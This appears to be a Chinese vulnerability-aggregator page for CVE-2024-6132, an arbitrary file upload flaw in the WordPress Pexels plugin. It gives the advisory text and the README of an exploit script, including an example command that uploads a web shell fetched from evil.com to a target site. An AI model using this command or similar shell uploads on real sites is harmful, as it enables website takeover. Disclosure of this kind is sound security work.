关联漏洞
标题:
WordPress plugin Pexels: Free Stock Photos 安全漏洞
(CVE-2024-6132)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Pexels: Free Stock Photos 1.2.2 版本及之前版本存在安全漏洞,该漏洞源于 pexels_fsp_images_options_validate 函数中缺少文件类型验证,导致任意文件上传。
描述
Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload
介绍
# CVE-2024-6132
Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload
## Usage
```
usage: CVE-2024-6132.py [-h] -u URL -un USERNAME -p PASSWORD -shell_url SHELL_URL
Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload | BY NXPLOIT - KHALED ALENAZI,
options:
-h, --help show this help message and exit
-u URL, --url URL WordPress site URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-shell_url SHELL_URL, --shell_url SHELL_URL
URL of the malicious PHP file
```
## Example:
```
python3 CVE-2024-6132.py -u https://targetsite.com -un contributor -p password123 -shell_url http://evil.com/shell.php
文件快照
[4.0K] /data/pocs/324286e8ee540805f9b40b502f55e2f237b63c2a
├── [3.4K] CVE-2024-6132.py
└── [ 833] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。